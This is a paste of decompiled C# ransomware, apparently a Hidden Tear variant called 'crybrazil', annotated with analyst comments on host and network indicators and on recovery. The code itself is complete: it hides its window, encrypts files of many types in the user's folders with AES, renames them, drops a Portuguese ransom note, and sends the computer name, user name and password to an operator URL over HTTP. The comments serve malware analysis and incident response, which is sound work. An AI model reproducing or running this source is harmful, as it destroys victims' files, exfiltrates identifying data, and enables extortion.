
Untitled

a guest
Jun 9th, 2018
  1. using System;
  2. using System.ComponentModel;
  3. using System.Diagnostics;
  4. using System.Drawing;
  5. using System.IO;
  6. using System.Linq;
  7. using System.Net;
  8. using System.Runtime.InteropServices;
  9. using System.Security.Cryptography;
  10. using System.Text;
  11. using System.Windows.Forms;
  12.  
  13. namespace hidden_tear
  14. {
  15. // Token: 0x02000002 RID: 2
  16. public class Form1 : Form
  17. {
  18. // Token: 0x06000001 RID: 1
  // Analyst note: P/Invoke binding for SystemParametersInfo in user32.dll. The only caller in
  // this listing is SetWallpaper, which uses it to replace the victim's desktop wallpaper.
  19. [DllImport("user32.dll", CharSet = CharSet.Auto)]
  20. private static extern int SystemParametersInfo(uint action, uint uParam, string vParam, uint winIni);
  21.  
  22. // Token: 0x06000002 RID: 2 RVA: 0x000020E0 File Offset: 0x000002E0
  // Constructor: only runs InitializeComponent(), which subscribes Form1_Load to the Load
  // event. The payload therefore starts as soon as the form is loaded.
  23. public Form1()
  24. {
  25. this.InitializeComponent();
  26. }
  27.  
  28. // Token: 0x06000003 RID: 3 RVA: 0x00002058 File Offset: 0x00000258
  // Load handler and effective entry point of the sample: the window is made fully
  // transparent and removed from the taskbar, then startAction() runs synchronously on
  // this handler. Analyst note: the victim gets no window to notice; the process is still
  // visible in process listings.
  29. private void Form1_Load(object sender, EventArgs e)
  30. {
  31. base.Opacity = 0.0;
  32. base.ShowInTaskbar = false;
  33. this.startAction();
  34. }
  35.  
  36. // Token: 0x17000001 RID: 1
  37. // (get) Token: 0x06000004 RID: 4 RVA: 0x0000213C File Offset: 0x0000033C
  // Adds extended window style 128 (0x80, WS_EX_TOOLWINDOW) to the form's creation
  // parameters. Tool windows are omitted from the taskbar and the Alt+Tab list, so this is
  // a second UI-hiding measure next to the Opacity/ShowInTaskbar settings in Form1_Load.
  38. protected override CreateParams CreateParams
  39. {
  40. get
  41. {
  42. CreateParams createParams = base.CreateParams;
  43. createParams.ExStyle |= 128; // 0x80 = WS_EX_TOOLWINDOW
  44. return createParams;
  45. }
  46. }
  47.  
  48. // Token: 0x06000005 RID: 5 RVA: 0x00002076 File Offset: 0x00000276
  // Hides the form and sets Opacity to 100.0.
  // NOTE(review): InitializeComponent in this listing subscribes only the Load event, so
  // this handler appears to be unused here - confirm against the binary's resources/events.
  49. private void Form_Shown(object sender, EventArgs e)
  50. {
  51. base.Visible = false;
  52. base.Opacity = 100.0;
  53. }
  54.  
  55. // Token: 0x06000006 RID: 6 RVA: 0x00002168 File Offset: 0x00000368
  // Encrypts a byte buffer with Rijndael configured as AES-256-CBC and returns the ciphertext.
  //   bytesToBeEncrypted - plaintext buffer (EncryptFile passes the whole file content).
  //   passwordBytes      - secret fed to PBKDF2 (EncryptFile passes SHA-256 of the password).
  // Analyst notes (recovery / triage):
  //   * The salt is the constant {1..8} and the iteration count is 1000, so the derived key
  //     and IV depend only on passwordBytes. Every file encrypted with the same password
  //     shares one key/IV pair, and anyone holding the password can re-derive both.
  //   * Key (32 bytes) and IV (16 bytes) are taken, in that order, from the same PBKDF2
  //     output stream; the IV is not stored with the ciphertext.
  //   * Padding is left at the RijndaelManaged default (PKCS7). No MAC or other integrity
  //     tag is produced, so the output is raw CBC ciphertext with no header.
  56. public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes)
  57. {
  58. byte[] result = null;
  59. byte[] salt = new byte[] // fixed salt shared by every file and every victim
  60. {
  61. 1,
  62. 2,
  63. 3,
  64. 4,
  65. 5,
  66. 6,
  67. 7,
  68. 8
  69. };
  70. using (MemoryStream memoryStream = new MemoryStream())
  71. {
  72. using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
  73. {
  74. rijndaelManaged.KeySize = 256;
  75. rijndaelManaged.BlockSize = 128; // 128-bit block = AES
  76. Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passwordBytes, salt, 1000);
  77. rijndaelManaged.Key = rfc2898DeriveBytes.GetBytes(rijndaelManaged.KeySize / 8); // first 32 bytes of PBKDF2 output
  78. rijndaelManaged.IV = rfc2898DeriveBytes.GetBytes(rijndaelManaged.BlockSize / 8); // next 16 bytes of the same stream
  79. rijndaelManaged.Mode = CipherMode.CBC;
  80. using (CryptoStream cryptoStream = new CryptoStream(memoryStream, rijndaelManaged.CreateEncryptor(), CryptoStreamMode.Write))
  81. {
  82. cryptoStream.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length);
  83. cryptoStream.Close(); // closing flushes the final padded block into memoryStream
  84. }
  85. result = memoryStream.ToArray();
  86. }
  87. }
  88. return result;
  89. }
  90.  
  91. // Token: 0x06000007 RID: 7 RVA: 0x00002270 File Offset: 0x00000470
  // Builds a string of `length` characters drawn from a 68-character alphabet using
  // System.Random.
  // Analyst note: nothing in this listing calls this method; startAction uses a hard-coded
  // constant as the password instead. System.Random is not a cryptographic generator.
  92. public string CreatePassword(int length)
  93. {
  94. StringBuilder stringBuilder = new StringBuilder();
  95. Random random = new Random();
  96. while (0 < length--)
  97. {
  98. stringBuilder.Append("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=?()"[random.Next("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=?()".Length)]);
  99. }
  100. return stringBuilder.ToString();
  101. }
  102.  
  103. // Token: 0x06000008 RID: 8 RVA: 0x000022C0 File Offset: 0x000004C0
  // Reports the victim and the encryption password to the operator: concatenates
  // "<computerName>-<userName> <password>", appends it to targetURL and issues an HTTP GET
  // through WebClient.DownloadString. The response body is discarded.
  // Analyst notes (detection):
  //   * targetURL uses plain http, so machine name, user name and password cross the
  //     network in clear text inside the "info=" query value and can be seen by proxy
  //     logs and network sensors.
  //   * The value is not URL-encoded (it contains a literal space).
  //   * Every exception is swallowed, so a blocked or failed request leaves no trace in
  //     the process and is not retried by this method.
  104. public void SendPassword(string password)
  105. {
  106. try
  107. {
  108. string str = string.Concat(new string[]
  109. {
  110. this.computerName,
  111. "-",
  112. this.userName,
  113. " ",
  114. password
  115. });
  116. string address = this.targetURL + str;
  117. new WebClient().DownloadString(address);
  118. }
  119. catch (Exception)
  120. {
  121. }
  122. }
  123.  
  124. // Token: 0x06000009 RID: 9 RVA: 0x00002330 File Offset: 0x00000530
  // Encrypts one file in place: reads the whole file into memory, hashes the UTF-8 password
  // with SHA-256, passes that hash to AES_Encrypt as the PBKDF2 secret, overwrites the
  // original file with the ciphertext and renames it by appending ".crybrazil".
  // Analyst notes (host indicators / recovery):
  //   * Affected files carry the ".crybrazil" suffix after their original name and extension.
  //   * The original is overwritten, not copied; this code keeps no plaintext copy.
  //   * The write happens before the rename, so a file can hold ciphertext under its
  //     original name if File.Move throws.
  //   * It also deletes <userDir>Users\<user>\Desktop\SUA_CHAVE.html.hacked when present;
  //     nothing in this listing creates that file, so the purpose is not evident here.
  125. public void EncryptFile(string file, string password)
  126. {
  127. byte[] bytesToBeEncrypted = File.ReadAllBytes(file);
  128. byte[] array = Encoding.UTF8.GetBytes(password);
  129. array = SHA256.Create().ComputeHash(array); // PBKDF2 input = SHA-256(UTF-8(password))
  130. byte[] bytes = this.AES_Encrypt(bytesToBeEncrypted, array);
  131. string str = "Users\\";
  132. string str2 = str + this.userName + "\\Desktop\\SUA_CHAVE.html.hacked";
  133. string path = this.userDir + str2;
  134. if (File.Exists(path))
  135. {
  136. File.Delete(path);
  137. }
  138. File.WriteAllBytes(file, bytes); // in-place overwrite with ciphertext
  139. File.Move(file, file + ".crybrazil");
  140. }
  141.  
  142. // Token: 0x0600000A RID: 10 RVA: 0x000023B8 File Offset: 0x000005B8
  // Walks `location` recursively and calls EncryptFile on every file whose extension is in
  // the list below, using the same `password` throughout.
  // Analyst notes (scoping an incident):
  //   * The extension test is source.Contains(extension) with the default string comparer,
  //     i.e. case-sensitive: a file named "REPORT.PDF" does not match ".pdf" and is left
  //     untouched, and ".PAQ" matches only in upper case.
  //   * ".crybrazil" is not in the list, so files already renamed by EncryptFile are not
  //     encrypted a second time if the sample runs again.
  //   * One try/catch wraps both loops and swallows everything. An exception on any file
  //     (locked file, access denied, ...) stops processing of the remaining files and of all
  //     subdirectories of this directory, so encryption of a tree can be partial.
  143. public void encryptDirectory(string location, string password)
  144. {
  145. try
  146. {
  // Target extension list (documents, media, source code, archives, databases, key and
  // certificate material, virtual-disk and mail-store formats).
  147. string[] source = new string[]
  148. {
  149. ".dat",
  150. ".keychain",
  151. ".sdf",
  152. ".vcf",
  153. ".jpg",
  154. ".png",
  155. ".tiff",
  156. ".tif",
  157. ".gif",
  158. ".jpeg",
  159. ".jif",
  160. ".jfif",
  161. ".jp2",
  162. ".jpx",
  163. ".j2k",
  164. ".j2c",
  165. ".fpx",
  166. ".pcd",
  167. ".bmp",
  168. ".svg",
  169. ".3dm",
  170. ".3ds",
  171. ".max",
  172. ".obj",
  173. ".dds",
  174. ".psd",
  175. ".tga",
  176. ".thm",
  177. ".yuv",
  178. ".ai",
  179. ".eps",
  180. ".ps",
  181. ".indd",
  182. ".pct",
  183. ".mp4",
  184. ".avi",
  185. ".mkv",
  186. ".3g2",
  187. ".3gp",
  188. ".asf",
  189. ".flv",
  190. ".m4v",
  191. ".mov",
  192. ".mpg",
  193. ".rm",
  194. ".srt",
  195. ".swf",
  196. ".vob",
  197. ".wmv",
  198. ".doc",
  199. ".docx",
  200. ".txt",
  201. ".pdf",
  202. ".log",
  203. ".msg",
  204. ".odt",
  205. ".pages",
  206. ".rtf",
  207. ".tex",
  208. ".wpd",
  209. ".wps",
  210. ".csv",
  211. ".ged",
  212. ".key",
  213. ".pps",
  214. ".ppt",
  215. ".pptx",
  216. ".xml",
  217. ".json",
  218. ".xlsx",
  219. ".xlsm",
  220. ".xlsb",
  221. ".xls",
  222. ".mht",
  223. ".mhtml",
  224. ".htm",
  225. ".html",
  226. ".xltx",
  227. ".prn",
  228. ".dif",
  229. ".slk",
  230. ".xlam",
  231. ".xla",
  232. ".ods",
  233. ".docm",
  234. ".dotx",
  235. ".dotm",
  236. ".xps",
  237. ".ics",
  238. ".mp3",
  239. ".aif",
  240. ".iff",
  241. ".m3u",
  242. ".m4a",
  243. ".mid",
  244. ".mpa",
  245. ".wav",
  246. ".wma",
  247. ".msi",
  248. ".php",
  249. ".apk",
  250. ".app",
  251. ".bat",
  252. ".cgi",
  253. ".com",
  254. ".asp",
  255. ".aspx",
  256. ".cer",
  257. ".cfm",
  258. ".css",
  259. ".js",
  260. ".jsp",
  261. ".rss",
  262. ".xhtml",
  263. ".c",
  264. ".class",
  265. ".cpp",
  266. ".cs",
  267. ".h",
  268. ".java",
  269. ".lua",
  270. ".pl",
  271. ".py",
  272. ".sh",
  273. ".sln",
  274. ".swift",
  275. ".vb",
  276. ".vcxproj",
  277. ".dem",
  278. ".gam",
  279. ".nes",
  280. ".rom",
  281. ".sav",
  282. ".tgz",
  283. ".zip",
  284. ".rar",
  285. ".tar",
  286. ".7z",
  287. ".cbr",
  288. ".deb",
  289. ".gz",
  290. ".pkg",
  291. ".rpm",
  292. ".zipx",
  293. ".iso",
  294. ".accdb",
  295. ".db",
  296. ".dbf",
  297. ".mdb",
  298. ".sql",
  299. ".fnt",
  300. ".fon",
  301. ".otf",
  302. ".ttf",
  303. ".cfg",
  304. ".prf",
  305. ".bak",
  306. ".old",
  307. ".tmp",
  308. ".torrent",
  309. ".der",
  310. ".pfx",
  311. ".crt",
  312. ".csr",
  313. ".p12",
  314. ".pem",
  315. ".ott",
  316. ".sxw",
  317. ".stw",
  318. ".uot",
  319. ".ots",
  320. ".sxc",
  321. ".stc",
  322. ".wb2",
  323. ".odp",
  324. ".otp",
  325. ".sxd",
  326. ".std",
  327. ".uop",
  328. ".odg",
  329. ".otg",
  330. ".sxm",
  331. ".mml",
  332. ".lay",
  333. ".lay6",
  334. ".asc",
  335. ".sqlite3",
  336. ".sqlitedb",
  337. ".odb",
  338. ".frm",
  339. ".myd",
  340. ".myi",
  341. ".ibd",
  342. ".mdf",
  343. ".ldf",
  344. ".suo",
  345. ".pas",
  346. ".asm",
  347. ".cmd",
  348. ".ps1",
  349. ".vbs",
  350. ".dip",
  351. ".dch",
  352. ".sch",
  353. ".brd",
  354. ".rb",
  355. ".jar",
  356. ".fla",
  357. ".mpeg",
  358. ".m4u",
  359. ".djvu",
  360. ".nef",
  361. ".cgm",
  362. ".raw",
  363. ".vcd",
  364. ".backup",
  365. ".tbk",
  366. ".bz2",
  367. ".PAQ",
  368. ".aes",
  369. ".gpg",
  370. ".vmx",
  371. ".vmdk",
  372. ".vdi",
  373. ".sldm",
  374. ".sldx",
  375. ".sti",
  376. ".sxi",
  377. ".602",
  378. ".hwp",
  379. ".edb",
  380. ".potm",
  381. ".potx",
  382. ".ppam",
  383. ".ppsx",
  384. ".ppsm",
  385. ".pot",
  386. ".pptm",
  387. ".xltm",
  388. ".xlc",
  389. ".xlm",
  390. ".xlt",
  391. ".xlw",
  392. ".dot",
  393. ".docb",
  394. ".snt",
  395. ".onetoc2",
  396. ".dwg",
  397. ".wk1",
  398. ".wks",
  399. ".123",
  400. ".vsdx",
  401. ".vsd",
  402. ".eml",
  403. ".ost",
  404. ".pst"
  405. };
  406. string[] files = Directory.GetFiles(location);
  407. string[] directories = Directory.GetDirectories(location);
  408. for (int i = 0; i < files.Length; i++)
  409. {
  410. string extension = Path.GetExtension(files[i]);
  411. if (source.Contains(extension)) // case-sensitive match against the list above
  412. {
  413. this.EncryptFile(files[i], password);
  414. }
  415. }
  416. for (int i = 0; i < directories.Length; i++)
  417. {
  418. this.encryptDirectory(directories[i], password); // recursion; each level has its own try/catch
  419. }
  420. }
  421. catch (Exception)
  422. {
  423. }
  424. }
  425.  
  426. // Token: 0x0600000B RID: 11 RVA: 0x00002FC8 File Offset: 0x000011C8
  // Relocates the running executable to <userDir><userName>\Rand123\local.exe, creating the
  // directory if it is missing or deleting a previous local.exe if one exists.
  // Analyst notes (host indicators):
  //   * The destination is built from userDir + userName with no "Users\" segment, i.e.
  //     C:\<user>\Rand123\local.exe - outside the user profile that the other methods use.
  //   * The source path is assumed to be <current directory>\<process name>.exe. Nothing
  //     here catches exceptions, so if that file is not found File.Move throws and the
  //     exception propagates out of startAction, which calls this method first.
  //   * This listing contains no persistence step (no registry, startup-folder or
  //     scheduled-task write); the file is only moved.
  427. public void MoveVirus()
  428. {
  429. string path = this.userDir + this.userName + "\\Rand123";
  430. string text = this.userDir + this.userName + "\\Rand123\\local.exe";
  431. if (!Directory.Exists(path))
  432. {
  433. Directory.CreateDirectory(path);
  434. }
  435. else if (File.Exists(text))
  436. {
  437. File.Delete(text);
  438. }
  439. string str = "\\" + Process.GetCurrentProcess().ProcessName + ".exe";
  440. string text2 = Directory.GetCurrentDirectory() + str;
  441. string sourceFileName = text2;
  442. File.Move(sourceFileName, text);
  443. }
  444.  
  445. // Token: 0x0600000C RID: 12 RVA: 0x00003058 File Offset: 0x00001258
  // Connectivity probe: returns true when an HTTPS read from www.google.fr can be opened,
  // false on any exception.
  // Analyst note: startAction calls this in a loop before contacting the operator URL, so
  // repeated requests to this host precede the exfiltration request. On its own the
  // request is a weak indicator.
  446. public static bool CheckForInternetConnection()
  447. {
  448. bool result;
  449. try
  450. {
  451. using (WebClient webClient = new WebClient())
  452. {
  453. using (webClient.OpenRead("https://www.google.fr"))
  454. {
  455. result = true;
  456. }
  457. }
  458. }
  459. catch
  460. {
  461. result = false;
  462. }
  463. return result;
  464. }
  465.  
  466. // Token: 0x0600000D RID: 13 RVA: 0x000030C4 File Offset: 0x000012C4
  // Main payload sequence, called from Form1_Load:
  //   1. MoveVirus()                  - relocate the executable
  //   2. Directory_Settings_Sending() - encrypt the user's folders
  //   3. messageCreator()             - drop the ransom note
  //   4. loop until CheckForInternetConnection() succeeds, then download and set the
  //      wallpaper, send the password to the operator, and exit.
  // Analyst notes (recovery / containment):
  //   * The password is a constant embedded in the binary (64 hex characters, used as a
  //     text string), not a per-victim value. Combined with the fixed salt in AES_Encrypt,
  //     every file encrypted by this sample uses the same derivable key and IV, so
  //     decryption does not depend on the operator.
  //   * Encryption (step 2) completes before any network access; blocking outbound traffic
  //     stops the exfiltration and wallpaper download but not the encryption.
  //   * The do/while has no delay between attempts, so an offline host retries the
  //     connectivity probe continuously until it succeeds.
  467. public void startAction()
  468. {
  469. string password = "AA151257B1462D642E7E21FF9C80F83CAF043C3572D5ED59BD283D20641E3C9D";
  470. this.MoveVirus();
  471. this.Directory_Settings_Sending(password);
  472. this.messageCreator();
  473. string path = this.userDir + this.userName + "\\ranso4.jpg"; // wallpaper is saved next to the Rand123 folder
  474. bool flag;
  475. do
  476. {
  477. if (flag = Form1.CheckForInternetConnection())
  478. {
  479. this.SetWallpaperFromWeb(this.backgroundImageUrl, path);
  480. this.SendPassword(password);
  481. }
  482. }
  483. while (!flag);
  484. Application.Exit();
  485. }
  486.  
  487. // Token: 0x0600000E RID: 14 RVA: 0x00003138 File Offset: 0x00001338
  // Runs encryptDirectory over six folders of the current user's profile, in this order:
  // Desktop, Documents, Downloads, Pictures, Music, Videos.
  // Analyst note: the paths are built as <userDir>Users\<userName>\<folder> with userDir
  // fixed to "C:\", so only the logged-on user's folders at that literal location are in
  // scope. Other profiles, other drives and redirected folders are not referenced here.
  488. public void Directory_Settings_Sending(string password)
  489. {
  490. string str = "Users\\";
  491. string location = this.userDir + str + this.userName + "\\Desktop";
  492. string location2 = this.userDir + str + this.userName + "\\Documents";
  493. string location3 = this.userDir + str + this.userName + "\\Downloads";
  494. string location4 = this.userDir + str + this.userName + "\\Pictures";
  495. string location5 = this.userDir + str + this.userName + "\\Music";
  496. string location6 = this.userDir + str + this.userName + "\\Videos";
  497. this.encryptDirectory(location, password);
  498. this.encryptDirectory(location2, password);
  499. this.encryptDirectory(location3, password);
  500. this.encryptDirectory(location4, password);
  501. this.encryptDirectory(location5, password);
  502. this.encryptDirectory(location6, password);
  503. }
  504.  
  505. // Token: 0x0600000F RID: 15 RVA: 0x00003214 File Offset: 0x00001414
  // Writes the ransom note to <userDir>Users\<userName>\Desktop\SUA_CHAVE.html. The file
  // holds a single line: a link to the operator's site with a Portuguese heading
  // ("O QUE ESTÁ ACONTECENDO?" = "What is happening?"; SUA_CHAVE = "your key").
  // Analyst notes:
  //   * Host indicator: SUA_CHAVE.html on the user's desktop. It is written after the
  //     encryption pass (see startAction), so the note itself is not encrypted.
  //   * The anchor tag is not closed before <H3>, so the markup is malformed.
  //   * The bare expression on the third statement has its result discarded; it looks like
  //     a decompiler artifact of an unused local.
  506. public void messageCreator()
  507. {
  508. string str = "\\Desktop\\SUA_CHAVE.html";
  509. string path = this.userDir + "Users\\" + this.userName + str;
  510. this.computerName + "-" + this.userName;
  511. string[] contents = new string[]
  512. {
  513. "<a href= 'http://3e24c23r2213122c1cxdsxsd.unaux.com' target='_blank'<H3>O QUE ESTÁ ACONTECENDO?</H3></a>"
  514. };
  515. File.WriteAllLines(path, contents);
  516. }
  517.  
  518. // Token: 0x06000010 RID: 16 RVA: 0x0000208E File Offset: 0x0000028E
  // Sets the desktop wallpaper to the image at `path` through SystemParametersInfo.
  // action 20 (0x14) is SPI_SETDESKWALLPAPER; winIni 3 is SPIF_UPDATEINIFILE | SPIF_SENDCHANGE,
  // so the change is written to the user profile and broadcast. The return value is ignored.
  519. public void SetWallpaper(string path)
  520. {
  521. Form1.SystemParametersInfo(20u, 0u, path, 3u);
  522. }
  523.  
  524. // Token: 0x06000011 RID: 17 RVA: 0x00003274 File Offset: 0x00001474
  // Downloads the image at `url` to `path` with WebClient.DownloadFile and then applies it
  // as the wallpaper. Any exception is swallowed, so a failed download leaves the
  // wallpaper unchanged without any error.
  // Analyst note: startAction passes backgroundImageUrl (plain http) and a destination of
  // <userDir><userName>\ranso4.jpg, giving one network and one file-system indicator.
  525. private void SetWallpaperFromWeb(string url, string path)
  526. {
  527. try
  528. {
  529. WebClient webClient = new WebClient();
  530. webClient.DownloadFile(new Uri(url), path);
  531. this.SetWallpaper(path);
  532. }
  533. catch (Exception)
  534. {
  535. }
  536. }
  537.  
  538. // Token: 0x06000012 RID: 18 RVA: 0x000032B4 File Offset: 0x000014B4
  // Standard Windows Forms dispose pattern: releases the designer component container when
  // called from Dispose(true), then defers to the base class. No payload logic here.
  539. protected override void Dispose(bool disposing)
  540. {
  541. if (disposing && this.components != null)
  542. {
  543. this.components.Dispose();
  544. }
  545. base.Dispose(disposing);
  546. }
  547.  
  548. // Token: 0x06000013 RID: 19 RVA: 0x000032E4 File Offset: 0x000014E4
  // Designer-generated form setup: a 124x53 client area, icon loaded from the embedded
  // resources, name "Form1", window title "projet".
  // Analyst note: Load is the only event subscribed here, so Form1_Load is the single
  // path from form creation into the payload.
  549. private void InitializeComponent()
  550. {
  551. ComponentResourceManager componentResourceManager = new ComponentResourceManager(typeof(Form1));
  552. base.SuspendLayout();
  553. base.AutoScaleDimensions = new SizeF(6f, 13f);
  554. base.AutoScaleMode = AutoScaleMode.Font;
  555. base.ClientSize = new Size(124, 53);
  556. base.Icon = (Icon)componentResourceManager.GetObject("$this.Icon");
  557. base.Name = "Form1";
  558. this.Text = "projet";
  559. base.Load += this.Form1_Load; // entry into the payload
  560. base.ResumeLayout(false);
  561. }
  562.  
  563. // Token: 0x04000001 RID: 1
  // Network indicator: operator endpoint. SendPassword appends
  // "<computerName>-<userName> <password>" to this string and requests it over plain HTTP.
  564. private string targetURL = "http://3e24c23r2213122c1cxdsxsd.unaux.com/crybrazil/write.php?info=";
  565.  
  566. // Token: 0x04000002 RID: 2
  // Logged-on user name; used to build every file-system path in this class.
  567. private string userName = Environment.UserName;
  568.  
  569. // Token: 0x04000003 RID: 3
  // Machine name; sent to the operator as part of the victim identifier.
  570. private string computerName = Environment.MachineName.ToString();
  571.  
  572. // Token: 0x04000004 RID: 4
  // Hard-coded drive root; all target and drop paths are relative to C:\.
  573. private string userDir = "C:\\";
  574.  
  575. // Token: 0x04000005 RID: 5
  // Network indicator: image fetched over plain HTTP and applied as the wallpaper.
  576. private string backgroundImageUrl = "http://4.bp.blogspot.com/-11m8rWaFmWs/WuhochGTK0I/AAAAAAAAFTY/VkbbVhxYZDgW_jlbQ5lPbV8AEhyd4ihgQCK4BGAYYCw/s1600/ranso4.jpg";
  577.  
  578. // Token: 0x04000006 RID: 6
  // Designer component container, released in Dispose.
  579. private IContainer components = null;
  580. }
  581. }